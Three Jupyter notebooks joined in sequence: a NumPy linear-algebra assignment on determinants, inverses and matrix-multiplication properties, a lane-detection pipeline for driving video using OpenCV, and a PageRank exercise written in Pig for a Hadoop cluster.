np.array_equal(a_dot_z,z_mat)
# + colab={"base_uri": "https://localhost:8080/"} id="7yA-ZME0NFbX" outputId="896d3a0c-9412-4d75-be2d-13b7fcbb57b2"
null_mat = np.empty(A.shape, dtype=float)
null = np.array(null_mat,dtype=float)
print(null)
np.allclose(a_dot_z,null)
# + [markdown] id="3fWkbyo3NHDf"
# ## Determinant
# + [markdown] id="l8FZ2GxfNI5f"
# A determinant is a scalar value derived from a square matrix. The determinant is a fundamental and important value in matrix algebra. Although its practical use will not be evident in this laboratory, it will be used heavily in future lessons.
#
# The determinant of some matrix $A$ is denoted as $det(A)$ or $|A|$. So let's say $A$ is represented as:
# $$A = \begin{bmatrix}a_{(0,0)}&a_{(0,1)}\\a_{(1,0)}&a_{(1,1)}\end{bmatrix}$$
# We can compute for the determinant as:
# $$|A| = a_{(0,0)}*a_{(1,1)} - a_{(1,0)}*a_{(0,1)}$$
# So if we have $A$ as:
# $$A = \begin{bmatrix}1&4\\0&3\end{bmatrix}, |A| = 3$$
#
# But you might wonder: what about square matrices beyond the shape $(2,2)$? We can approach this problem using several methods, such as co-factor expansion and the method of minors. These are covered in the laboratory lecture, but we can delegate the strenuous computation for high-dimensional matrices to Python using `np.linalg.det()`.
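# A short check of the $2\times2$ formula above against `np.linalg.det`, using the example $A$ with $|A| = 3$:

```python
import numpy as np

# The 2x2 example from above, computed by the formula and checked with NumPy
A = np.array([[1, 4],
              [0, 3]])
manual = A[0, 0] * A[1, 1] - A[1, 0] * A[0, 1]
print(manual)             # 3
print(np.linalg.det(A))   # 3.0, up to floating-point rounding
```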
# + colab={"base_uri": "https://localhost:8080/"} id="YRqYsKQnNLVg" outputId="701354ed-c280-4a68-a8dc-6266d2f3a362"
A = np.array([
[2,3],
[1,6]
])
np.linalg.det(A)
# + colab={"base_uri": "https://localhost:8080/"} id="G3M0A13MNM6Y" outputId="9bd574a4-641d-4162-b534-f3dec5af35ab"
B = np.array([
[2, -3, 4],
[1, 6 ,0],
[-3, 6, 9]
])
np.linalg.det(B)
# + [markdown] id="efUekfogNSsI"
# ### Other mathematics classes would require you to solve this by hand, which is great for practicing your memorization and coordination skills, but in this class we aim for simplicity and speed, so we'll use programming. It's completely fine if you want to try solving this one by hand, too.
# + colab={"base_uri": "https://localhost:8080/"} id="dwUHCZScNQbn" outputId="7cc92b7c-7bcc-4b03-c86d-8245e04328d0"
B = np.array([
[2,-3,4,6],
[1,6,0,3],
[-3,6,9,2],
[1,2,3,4]
])
np.linalg.det(B)
# + [markdown] id="CSJwA6_0NoMZ"
# ## Inverse
# + [markdown] id="SAOUtn53NpoI"
# The inverse of a matrix is another fundamental operation in matrix algebra. Determining the inverse of a matrix lets us establish the solvability and characteristics of a system of linear equations; we'll expand on this in the next module. Another use of the inverse matrix is addressing the problem of divisibility between matrices. Element-wise division exists, but dividing one matrix by another as a whole does not. Inverse matrices provide a related operation that captures the concept of "dividing" matrices.
#
# Now to determine the inverse of a matrix we need to perform several steps. So let's say we have a matrix $M$:
# $$M = \begin{bmatrix}1&7\\-3&5\end{bmatrix}$$
# First, we need to get the determinant of $M$.
# $$|M| = (1)(5)-(-3)(7) = 26$$
# Next, we need to reform the matrix into the inverse form:
# $$M^{-1} = \frac{1}{|M|} \begin{bmatrix} m_{(1,1)} & -m_{(0,1)} \\ -m_{(1,0)} & m_{(0,0)}\end{bmatrix}$$
# So that will be:
# $$M^{-1} = \frac{1}{26} \begin{bmatrix} 5 & -7 \\ 3 & 1\end{bmatrix} = \begin{bmatrix} \frac{5}{26} & \frac{-7}{26} \\ \frac{3}{26} & \frac{1}{26}\end{bmatrix}$$
# For higher-dimension matrices you might need to use co-factors, minors, adjugates, and other reduction techniques. To solve this programmatically we can use `np.linalg.inv()`.
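# The worked $2\times2$ example above, computed by the adjugate formula and checked against `np.linalg.inv`:

```python
import numpy as np

# Inverse of M = [[1, 7], [-3, 5]] by the formula above
M = np.array([[1, 7],
              [-3, 5]])
det = M[0, 0] * M[1, 1] - M[1, 0] * M[0, 1]   # 26
M_inv = (1 / det) * np.array([[ M[1, 1], -M[0, 1]],
                              [-M[1, 0],  M[0, 0]]])
print(M_inv)
print(np.allclose(M_inv, np.linalg.inv(M)))   # True
print(np.allclose(M @ M_inv, np.eye(2)))      # True
```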
# + colab={"base_uri": "https://localhost:8080/"} id="7BTSUtUJNsRg" outputId="7c7cadcd-fefd-4d61-e352-8a1c0d9e54b4"
M = np.array([
[3,6],
[-4, 8]
])
np.array(M @ np.linalg.inv(M), dtype=int)
# + colab={"base_uri": "https://localhost:8080/"} id="JhIweD5INukI" outputId="6532591d-ccb0-4c87-d8c0-383e7c24614b"
P = np.array([
[3, 6, 9],
[-4, 8, 12],
[3, 6, 7]
])
Q = np.linalg.inv(P)
Q
# + colab={"base_uri": "https://localhost:8080/"} id="x1xsiSndNwAZ" outputId="505ca897-36dc-4a5b-f4fa-4ba34eeb0549"
P @ Q
# + [markdown] id="Zp5sKkfXNzvJ"
# ## And now let's test your skills in solving a matrix with high dimensions:
# + colab={"base_uri": "https://localhost:8080/"} id="QQy_38xmN0Uz" outputId="fcee3c8a-b50d-48ee-87e6-5dbed7354a1b"
N = np.array([
[18,5,23,1,0,33,5],
[0,45,0,11,2,4,2],
[5,9,20,0,0,0,3],
[1,6,4,4,8,43,1],
[8,6,8,7,1,6,1],
[-5,15,2,0,0,6,-30],
[-2,-5,1,2,1,20,12],
])
N_inv = np.linalg.inv(N)
np.array(N @ N_inv,dtype=int)
# + [markdown] id="HI6qUBDJN20Q"
# To validate whether the matrix that you have solved for is really the inverse, we use the following dot product property for a matrix $M$:
# $$M\cdot M^{-1} = I$$
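# A minimal sketch of that validation, checking $M \cdot M^{-1}$ against the identity with a floating-point tolerance:

```python
import numpy as np

# M @ M_inv should be numerically close to the identity matrix
M = np.array([[3.0, 6.0],
              [-4.0, 8.0]])
M_inv = np.linalg.inv(M)
print(np.allclose(M @ M_inv, np.eye(2)))  # True
```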
# + colab={"base_uri": "https://localhost:8080/"} id="9tsY3lQhN5GA" outputId="587a2c45-4f1f-424e-d9c4-530d401c7976"
squad = np.array([
[1.0, 1.0, 0.5],
[0.7, 0.7, 0.9],
[0.3, 0.3, 1.0]
])
weights = np.array([
[0.2, 0.2, 0.6]
])
p_grade = squad @ weights.T
p_grade
# + id="DAnTx0CCN6z5"
# + [markdown] id="T9KRyYgnN8fL"
# ## Activity
# + [markdown] id="2G6cCyU1N9b4"
# ### Task 1
# + [markdown] id="SQnKgPrXN__i"
# Prove and implement the remaining 6 matrix multiplication properties. You may create your own matrices, whose shapes should not be smaller than $(3,3)$.
# In your methodology, create an individual flowchart for each property and discuss it; then present your proofs of the validity of your implementation in the results section by comparing your results against existing NumPy functions.
# + [markdown] id="Jj7QBi2nqRkw"
# ### Dot Product has special properties
#
# Dot products are prevalent in matrix algebra, which implies several unique properties that should be considered when formulating solutions:
# 1. $A \cdot B \neq B \cdot A$
# 2. $A \cdot (B \cdot C) = (A \cdot B) \cdot C$
# 3. $A\cdot(B+C) = A\cdot B + A\cdot C$
# 4. $(B+C)\cdot A = B\cdot A + C\cdot A$
# 5. $A\cdot I = A$
# 6. $A\cdot \emptyset = \emptyset$
# + id="cbG4QU_lOA3g"
import numpy as np
import matplotlib.pyplot as plt
# %matplotlib inline
I = np.array([
[2, 5, 7, 7],
[13, 5, 12, 5],
[3, 5, 21, 15],
[4, 7, 93, 7]
])
L = np.array([
[23, 5, 6, 3],
[6, 4, 2, 8],
[6, 8, 1, 9],
[17, 7, 12, 8]
])
Y = np.array([
[12, 2, 5, 6],
[4, 66, 71, 3],
[4, 6, 82, 3],
[17, 67, 22, 19]
])
# + id="ActGASuIqWIj"
# Products and sums of the base matrices, reused in the property checks below
A = I.dot(L)
B = L.dot(Y)
C = Y.dot(I)
D = I.dot(A)
F = C.dot(Y)
G = I + L
H = Y + L
S = F + A  # renamed from I so the base matrix I is not overwritten
# + colab={"base_uri": "https://localhost:8080/"} id="OlXTOZOKrIx6" outputId="3a446ce2-f6ec-4520-f09d-644d59cff1cf"
print('Property 1: A @ B != B @ A (dot product is not commutative)')
print('Matrix AB:')
print(np.matmul(A, B))
print('Matrix BA:')
print(np.matmul(B, A))
print('Equal?', np.array_equal(np.matmul(A, B), np.matmul(B, A)))
# + colab={"base_uri": "https://localhost:8080/"} id="jlz_-8FGrMWa" outputId="7c2555f6-5d80-4c97-82c3-70733ea920b3"
print('Property 2: A @ (B @ C) == (A @ B) @ C (associativity)')
print('Matrix A(BC):')
print(np.matmul(A, np.matmul(B, C)))
print('Matrix (AB)C:')
print(np.matmul(np.matmul(A, B), C))
print('Equal?', np.array_equal(np.matmul(A, np.matmul(B, C)), np.matmul(np.matmul(A, B), C)))
# + colab={"base_uri": "https://localhost:8080/"} id="ru_RgR2ArOZB" outputId="d63bbe50-3de0-4248-8506-43494617b645"
print('Property 3: A @ (B + C) == A @ B + A @ C (left distributivity)')
print('Matrix A(B+C):')
print(np.matmul(A, B + C))
print('Matrix AB + AC:')
print(np.matmul(A, B) + np.matmul(A, C))
print('Equal?', np.array_equal(np.matmul(A, B + C), np.matmul(A, B) + np.matmul(A, C)))
# + colab={"base_uri": "https://localhost:8080/"} id="H_Speh9FrQha" outputId="262d7731-5058-4f02-b8a9-a4abbb2fb64c"
print('Property 4: (B + C) @ A == B @ A + C @ A (right distributivity)')
print('Matrix (B+C)A:')
print(np.matmul(B + C, A))
print('Matrix BA + CA:')
print(np.matmul(B, A) + np.matmul(C, A))
print('Equal?', np.array_equal(np.matmul(B + C, A), np.matmul(B, A) + np.matmul(C, A)))
# + colab={"base_uri": "https://localhost:8080/"} id="6N9SaCR9roLC" outputId="510c6e8b-1406-4dd3-9f95-db2c09eefbfb"
print('Property 5: A @ I == A (identity matrix)')
identity = np.eye(A.shape[0])
print('Matrix A @ I:')
print(A @ identity)
print('Equal?', np.array_equal(A @ identity, A))
# + colab={"base_uri": "https://localhost:8080/"} id="W07pBSROrqGo" outputId="31dbca83-2034-4623-8f98-c5a0f6027a56"
print('Property 6: A @ 0 == 0 (zero matrix)')
zeros = np.zeros(A.shape)
print('Matrix A @ 0:')
print(A @ zeros)
print('Equal?', np.array_equal(A @ zeros, zeros))
|
Assignment_5.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
import cv2
import math
from moviepy.editor import VideoFileClip
from IPython.display import HTML
# %matplotlib inline
def process_image(videoframe):
mtx = np.array([
[1.15662906e+03, 0.00000000e+00, 6.69041437e+02],
[0.00000000e+00, 1.15169194e+03, 3.88137239e+02],
[0.00000000e+00, 0.00000000e+00, 1.00000000e+00]])
dist = np.array([[-0.2315715, -0.12000538, -0.00118338, 0.00023305, 0.15641572]])
def color_and_gradient(img, thresh_min=20, thresh_max=100, s_thresh_min=170, s_thresh_max=255):
# Convert to HLS color space and separate the S channel
# Note: img is the undistorted image passed in by the caller
hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)
s_channel = hls[:,:,2]
# Grayscale image
# NOTE: we already saw that standard grayscaling lost color information for the lane lines
# Explore gradients in other colors spaces / color channels to see what might work better
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
# Sobel x
sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0) # Take the derivative in x
abs_sobelx = np.absolute(sobelx) # Absolute x derivative to accentuate lines away from horizontal
scaled_sobel = np.uint8(255*abs_sobelx/np.max(abs_sobelx))
# Threshold x gradient
#thresh_min = 20
#thresh_max = 100
sxbinary = np.zeros_like(scaled_sobel)
sxbinary[(scaled_sobel >= thresh_min) & (scaled_sobel <= thresh_max)] = 1
# Threshold color channel
# s_thresh_min = 180
# s_thresh_max = 255
s_binary = np.zeros_like(s_channel)
s_binary[(s_channel >= s_thresh_min) & (s_channel <= s_thresh_max)] = 1
# Stack each channel to view their individual contributions in green and blue respectively
# This returns a stack of the two binary images, whose components you can see as different colors
color_binary = np.dstack(( np.zeros_like(sxbinary), sxbinary, s_binary)) * 255
# Combine the two binary thresholds
combined_binary = np.zeros_like(sxbinary)
combined_binary[(s_binary == 1) | (sxbinary == 1)] = 1
return combined_binary
def unwarp(img):
# Defining 4 source points src = np.float32([[,],[,],[,],[,]])
src = np.float32([[200,720], # left bottom
[574,460], # left top
[715,460], # right top
[1120,712]]) # right bottom
# Defining 4 destination points dst = np.float32([[,],[,],[,],[,]])
margin = 320
dst = np.float32([[margin,img.shape[0]], # left bottom
[margin,0], # left top
[img.shape[1]-margin,0], # right top
[img.shape[1]-margin,img.shape[0]]]) # right bottom
# d) use cv2.getPerspectiveTransform() to get M, the transform matrix
M = cv2.getPerspectiveTransform(src, dst)
Minv = cv2.getPerspectiveTransform(dst, src)
# e) use cv2.warpPerspective() to warp your image to a top-down view
warped = cv2.warpPerspective(img, M, (img.shape[1], img.shape[0]), flags=cv2.INTER_LINEAR)
return warped, Minv
def find_lane_pixels(binary_warped):
# Take a histogram of the bottom half of the image
histogram = np.sum(binary_warped[binary_warped.shape[0]//2:,:], axis=0)
# Create an output image to draw on and visualize the result
out_img = np.dstack((binary_warped, binary_warped, binary_warped))
# Find the peak of the left and right halves of the histogram
# These will be the starting point for the left and right lines
midpoint = int(histogram.shape[0]//2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:]) + midpoint
# HYPERPARAMETERS
# Choose the number of sliding windows
nwindows = 9
# Set the width of the windows +/- margin
margin = 100
# Set minimum number of pixels found to recenter window
minpix = 50
# Set height of windows - based on nwindows above and image shape
window_height = int(binary_warped.shape[0]//nwindows)
# Identify the x and y positions of all nonzero pixels in the image
nonzero = binary_warped.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
# Current positions to be updated later for each window in nwindows
leftx_current = leftx_base
rightx_current = rightx_base
# Create empty lists to receive left and right lane pixel indices
left_lane_inds = []
right_lane_inds = []
# Step through the windows one by one
for window in range(nwindows):
# Identify window boundaries in x and y (and right and left)
win_y_low = binary_warped.shape[0] - (window+1)*window_height
win_y_high = binary_warped.shape[0] - window*window_height
win_xleft_low = leftx_current - margin
win_xleft_high = leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
# Draw the windows on the visualization image
cv2.rectangle(out_img,(win_xleft_low,win_y_low),
(win_xleft_high,win_y_high),(0,255,0), 2)
cv2.rectangle(out_img,(win_xright_low,win_y_low),
(win_xright_high,win_y_high),(0,255,0), 2)
# Identify the nonzero pixels in x and y within the window #
good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &
(nonzerox >= win_xleft_low) & (nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &
(nonzerox >= win_xright_low) & (nonzerox < win_xright_high)).nonzero()[0]
# Append these indices to the lists
left_lane_inds.append(good_left_inds)
right_lane_inds.append(good_right_inds)
# If you found > minpix pixels, recenter next window on their mean position
if len(good_left_inds) > minpix:
leftx_current = int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
rightx_current = int(np.mean(nonzerox[good_right_inds]))
# Concatenate the arrays of indices (previously was a list of lists of pixels)
try:
left_lane_inds = np.concatenate(left_lane_inds)
right_lane_inds = np.concatenate(right_lane_inds)
except ValueError:
# Avoids an error if the above is not implemented fully
pass
# Extract left and right line pixel positions
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
return leftx, lefty, rightx, righty, out_img
def fit_polynomial(binary_warped):
# Find our lane pixels first
leftx, lefty, rightx, righty, out_img = find_lane_pixels(binary_warped)
# Fit a second order polynomial to each using `np.polyfit`
left_fit = np.polyfit(lefty, leftx, 2)
right_fit = np.polyfit(righty, rightx, 2)
# Generate x and y values for plotting
ploty = np.linspace(0, binary_warped.shape[0]-1, binary_warped.shape[0] )
try:
left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]
right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]
except TypeError:
# Avoids an error if `left` and `right_fit` are still none or incorrect
print('The function failed to fit a line!')
left_fitx = 1*ploty**2 + 1*ploty
right_fitx = 1*ploty**2 + 1*ploty
## Visualization ##
# Colors in the left and right lane regions
out_img[lefty, leftx] = [255, 0, 0]
out_img[righty, rightx] = [0, 0, 255]
# Plots the left and right polynomials on the lane lines
#plt.plot(left_fitx, ploty, color='yellow')
#plt.plot(right_fitx, ploty, color='yellow')
return out_img, left_fit, right_fit
def fit_poly(img_shape, leftx, lefty, rightx, righty):
### TO-DO: Fit a second order polynomial to each with np.polyfit() ###
left_fit = np.polyfit(lefty, leftx, 2)
right_fit = np.polyfit(righty, rightx, 2)
# Generate x and y values for plotting
ploty = np.linspace(0, img_shape[0]-1, img_shape[0])
### TO-DO: Calc both polynomials using ploty, left_fit and right_fit ###
left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]
right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]
global last_good_left_fitx
global last_good_right_fitx
lane_width_min = 500
if min(right_fitx-left_fitx)>lane_width_min:
last_good_left_fitx=left_fitx
last_good_right_fitx=right_fitx
return left_fitx, right_fitx, ploty
else:
return last_good_left_fitx, last_good_right_fitx, ploty
def search_around_poly(binary_warped):
# HYPERPARAMETER
# Choose the width of the margin around the previous polynomial to search
# The quiz grader expects 100 here, but feel free to tune on your own!
margin = 50
# Grab activated pixels
nonzero = binary_warped.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
### TO-DO: Set the area of search based on activated x-values ###
### within the +/- margin of our polynomial function ###
### Hint: consider the window areas for the similarly named variables ###
### in the previous quiz, but change the windows to our new search area ###
left_lane_inds = ((nonzerox > (left_fit[0]*(nonzeroy**2) + left_fit[1]*nonzeroy +
left_fit[2] - margin)) & (nonzerox < (left_fit[0]*(nonzeroy**2) +
left_fit[1]*nonzeroy + left_fit[2] + margin)))
right_lane_inds = ((nonzerox > (right_fit[0]*(nonzeroy**2) + right_fit[1]*nonzeroy +
right_fit[2] - margin)) & (nonzerox < (right_fit[0]*(nonzeroy**2) +
right_fit[1]*nonzeroy + right_fit[2] + margin)))
# Again, extract left and right line pixel positions
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
# Fit new polynomials
left_fitx, right_fitx, ploty = fit_poly(binary_warped.shape, leftx, lefty, rightx, righty)
## Visualization ##
# Create an image to draw on and an image to show the selection window
out_img = np.dstack((binary_warped, binary_warped, binary_warped))*255
window_img = np.zeros_like(out_img)
# Color in left and right line pixels
out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]
out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]
# Generate a polygon to illustrate the search window area
# And recast the x and y points into usable format for cv2.fillPoly()
left_line_window1 = np.array([np.transpose(np.vstack([left_fitx-margin, ploty]))])
left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([left_fitx+margin,
ploty])))])
left_line_pts = np.hstack((left_line_window1, left_line_window2))
right_line_window1 = np.array([np.transpose(np.vstack([right_fitx-margin, ploty]))])
right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fitx+margin,
ploty])))])
right_line_pts = np.hstack((right_line_window1, right_line_window2))
# Draw the lane onto the warped blank image
cv2.fillPoly(window_img, np.int_([left_line_pts]), (0,255, 0))
cv2.fillPoly(window_img, np.int_([right_line_pts]), (0,255, 0))
search_around_prior_result = cv2.addWeighted(out_img, 1, window_img, 0.3, 0)
# Plot the polynomial lines onto the image
#plt.plot(left_fitx, ploty, color='yellow')
#plt.plot(right_fitx, ploty, color='yellow')
## End visualization steps ##
return search_around_prior_result, ploty, left_fit, right_fit, left_fitx, right_fitx
def measure_curvature_pixels():
'''
Calculates the curvature of polynomial functions in pixels.
'''
# Start by generating our fake example data
# Make sure to feed in your real data instead in your project!
#ploty, left_fit, right_fit = generate_data()
ploty = np.linspace(0, img_shape[0]-1, img_shape[0])
# Define y-value where we want radius of curvature
# We'll choose the maximum y-value, corresponding to the bottom of the image
y_eval = np.max(ploty)
# Calculation of R_curve (radius of curvature)
left_curverad = ((1 + (2*left_fit[0]*y_eval + left_fit[1])**2)**1.5) / np.absolute(2*left_fit[0])
right_curverad = ((1 + (2*right_fit[0]*y_eval + right_fit[1])**2)**1.5) / np.absolute(2*right_fit[0])
return left_curverad, right_curverad
def measure_curvature_real():
'''
Calculates the curvature of polynomial functions in meters.
'''
# Define conversions in x and y from pixels space to meters
ym_per_pix = 30/720 # meters per pixel in y dimension
xm_per_pix = 3.7/600 # meters per pixel in x dimension
# Start by generating our fake example data
# Make sure to feed in your real data instead in your project!
ploty = np.linspace(0, img_shape[0]-1, img_shape[0])
left_fit_cr = np.polyfit(ploty*ym_per_pix, left_fitx*xm_per_pix, 2)
right_fit_cr = np.polyfit(ploty*ym_per_pix, right_fitx*xm_per_pix, 2)
# Define y-value where we want radius of curvature
# We'll choose the maximum y-value, corresponding to the bottom of the image
y_eval = np.max(ploty)
# Calculation of R_curve (radius of curvature)
left_curverad = ((1 + (2*left_fit_cr[0]*y_eval*ym_per_pix + left_fit_cr[1])**2)**1.5) / np.absolute(2*left_fit_cr[0])
right_curverad = ((1 + (2*right_fit_cr[0]*y_eval*ym_per_pix + right_fit_cr[1])**2)**1.5) / np.absolute(2*right_fit_cr[0])
return left_curverad, right_curverad
def vehicle_offset(img_shape, left_fitx, right_fitx, xm_per_pix):
# vertical image central axis = vehicle central axis
cen_imgx = img_shape[1]//2
# vehicle position with respect to the lane center
veh_pos = (left_fitx[-1] + right_fitx[-1])/2
#vehicle offset
veh_offsetx = (cen_imgx - veh_pos) * xm_per_pix
return veh_offsetx
def draw_lane_area(binary_warped, left_fitx, right_fitx, Minv, img):
# Create an image to draw the lines on
warp_zero = np.zeros_like(binary_warped).astype(np.uint8)
color_warp = np.dstack((warp_zero, warp_zero, warp_zero))
#plt.imshow(color_warp)
# Recast the x and y points into usable format for cv2.fillPoly()
pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])
pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])
pts = np.hstack((pts_left, pts_right))
# Draw the lane onto the warped blank image
cv2.fillPoly(color_warp, np.int_([pts]), (0,255, 0))
# Warp the blank back to original image space using inverse perspective matrix (Minv)
newwarp = cv2.warpPerspective(color_warp, Minv, (img.shape[1], img.shape[0]))
# Combine the result with the original image
lane_area_result = cv2.addWeighted(undist, 1, newwarp, 0.3, 0)
return lane_area_result
def display_curvature_and_veh_position(img):
global framenr
cv2.putText(img, 'Frame #{:}'.format(framenr),
(60, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255), 1)
cv2.putText(img, 'Radius of Curvature: {:.2f} m'.format(curverad),
(60, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255), 1)
if veh_offsetx<0:
cv2.putText(img, 'Vehicle is {:.2f} m left to center '.format(abs(veh_offsetx)),
(60, 70), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255), 1)
elif veh_offsetx == 0:
cv2.putText(img, 'Vehicle is on lane center',
(60, 70), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255), 1)
else:
cv2.putText(img, 'Vehicle is {:.2f} m right to center '.format(abs(veh_offsetx)),
(60, 70), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255), 1)
framenr += 1
return img
img = videoframe
undist = cv2.undistort(img, mtx, dist, None, mtx)
thresh_min=20
thresh_max=100
binary = color_and_gradient(undist,thresh_min, thresh_max, s_thresh_min, s_thresh_max)
binary_warped, Minv = unwarp(binary)
out_img, left_fit, right_fit = fit_polynomial(binary_warped)
img_shape = binary_warped.shape
search_around_prior_result, ploty, left_fit, right_fit, left_fitx, right_fitx = search_around_poly(binary_warped)
left_curverad, right_curverad = measure_curvature_pixels()
left_curverad, right_curverad = measure_curvature_real()
ym_per_pix = 30/720 # meters per pixel in y dimension
xm_per_pix = 3.7/600 # meters per pixel in x dimension
curverad = (left_curverad + right_curverad)/2
veh_offsetx = vehicle_offset(img_shape, left_fitx, right_fitx, xm_per_pix)
lane_area_result = draw_lane_area(binary_warped, left_fitx, right_fitx, Minv, img)
img_all_infos = display_curvature_and_veh_position(lane_area_result)
# picture in picture for bw image
front_img = out_img.copy()
scale_percent = 25
width = int(front_img.shape[1] * scale_percent / 100)
height = int(front_img.shape[0] * scale_percent / 100)
topx = img_all_infos.shape[1]-width
topy = 0
# resize image
dsize = (width, height)
thumbnail_img = cv2.resize(front_img, dsize)
# position thumbnail_img in front_img
pad = 20
img_all_infos[topy+pad:height+pad,topx-pad:img_all_infos.shape[1]-pad,:] = thumbnail_img[0:height,0:width,:]
plt.imshow(img_all_infos)
return img_all_infos
s_thresh_min=100
s_thresh_max=200
# Beginning and duration subclip
start_sec = 24
end_sec = start_sec + 1
white_output = 'test_videos_output/project_video_s_thresh_'+ str(s_thresh_min) + '-' + str(s_thresh_max) +'V3.mp4'
## To speed up the testing process you may want to try your pipeline on a shorter subclip of the video
## To do so add .subclip(start_second,end_second) to the end of the line below
## Where start_second and end_second are integer values representing the start and end of the subclip
## You may also uncomment the following line for a subclip of the first 5 seconds
##clip1 = VideoFileClip("test_videos/solidWhiteRight.mp4").subclip(0,5)
clip1 = VideoFileClip("project_video.mp4")#.subclip(start_sec, end_sec)
framenr = 0
last_good_left_fitx = np.array([])
last_good_right_fitx = np.array([])
white_clip = clip1.fl_image(process_image) #NOTE: this function expects color images!!
# %time white_clip.write_videofile(white_output, audio=False)
# -
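# A self-contained sanity check of the radius-of-curvature formula used in `measure_curvature_pixels()` above (the coefficient values here are illustrative, not taken from the pipeline):

```python
import numpy as np

# For a fitted polynomial x(y) = a*y^2 + b*y + c, the formula is
#   R(y) = (1 + (2*a*y + b)^2)^(3/2) / |2*a|
# At the vertex (where 2*a*y + b = 0) this reduces to R = 1/(2*a),
# so a = 1/2000 should give a radius of about 1000 pixels.
a, b = 1 / 2000.0, 0.0
y_eval = 0.0
curverad = ((1 + (2 * a * y_eval + b)**2)**1.5) / np.absolute(2 * a)
print(curverad)
```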
|
Project 2 - Advanced Lane Finding version 2.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # PageRank with PIG
# authors: *<NAME>., <NAME>*
# The [PageRank](https://en.wikipedia.org/wiki/PageRank) algorithm provides a measure of a site's relevance. It was invented by the founders of Google. The implementation proposed here is based on the one given in [Data-Intensive Text Processing with MapReduce](http://lintool.github.io/MapReduceAlgorithms/MapReduce-book-final.pdf), page 106. The algorithm is first applied to a test dataset (smaller, allowing fast development) and then to a larger one: [Google web graph](http://snap.stanford.edu/data/web-Google.html).
from jyquickhelper import add_notebook_menu
add_notebook_menu()
# ### Connecting to the cluster
import pyquickhelper
params={"blob_storage":"",
"password1":"",
"hadoop_server":"",
"password2":"",
"username":""}
pyquickhelper.ipythonhelper.open_html_form(params=params,title="server + hadoop + credentials", key_save="blobhp")
import pyensae
# %load_ext pyensae
blobstorage = blobhp["blob_storage"]
blobpassword = blobhp["password1"]
hadoop_server = blobhp["hadoop_server"]
hadoop_password = blobhp["password2"]
username = blobhp["username"]
client, bs = %hd_open
client, bs
# ### Creating a small test dataset
# We create a dataset to test the algorithm (reusing the one presented in the book).
with open("DataTEST.txt", "w") as f:
    f.write("1\t2\n1\t4\n2\t3\n2\t5\n3\t4\n4\t5\n5\t3\n5\t1\n5\t2")
import pandas
df = pandas.read_csv("DataTEST.txt", sep="\t",names=["Frm","To"])
df
# We upload this graph:
# %blob_up DataTEST.txt /$PSEUDO/Data/DataTEST.txt
# We check that the data was uploaded correctly:
# %blob_ls /$PSEUDO/Data/
# ### Fetching real data
# We do the same with the real data: [Google web graph](http://snap.stanford.edu/data/web-Google.html)
pyensae.download_data("web-Google.txt.gz", url="http://snap.stanford.edu/data/")
# %head web-Google.txt
# We filter out the comment lines at the top of the file.
with open("web-Google.txt", "r") as f:
with open("DataGoogle.txt", "w") as g:
for line in f:
if not line.startswith("#"):
g.write(line)
# %head DataGoogle.txt
# %blob_up DataGoogle.txt /$PSEUDO/Data/DataGoogle.txt
# %blob_ls /$PSEUDO/Data/
# ### The PageRank algorithm
# **Initializing the table**
# +
# %%PIG Creation_Graph.pig
Arcs = LOAD '$CONTAINER/$PSEUDO/Data/$path'
USING PigStorage('\t')
AS (frm:int,to:int);
GrSort = GROUP Arcs BY frm;
deg_sort = FOREACH GrSort
GENERATE COUNT(Arcs) AS degs, Arcs , group AS ID;
GrEntr = GROUP Arcs BY to;
GrFin= JOIN deg_sort BY ID,
GrEntr BY group;
N = FOREACH (GROUP GrSort ALL)
GENERATE COUNT(GrSort);
Pr = FOREACH GrFin
GENERATE deg_sort::ID AS ID , (float) 1 / (float)N.$0 AS PageRank;
PageRank = JOIN GrFin BY deg_sort::ID,
Pr BY ID;
STORE PageRank
INTO '$CONTAINER/$PSEUDO/Projet/SortTest.txt'
USING PigStorage('\t') ;
# -
client.pig_submit(bs,
client.account_name,
"Creation_Graph.pig",
params=dict(path="DataTEST.txt"),
stop_on_failure=True)
# st = %hd_job_status job_1435385350894_0001
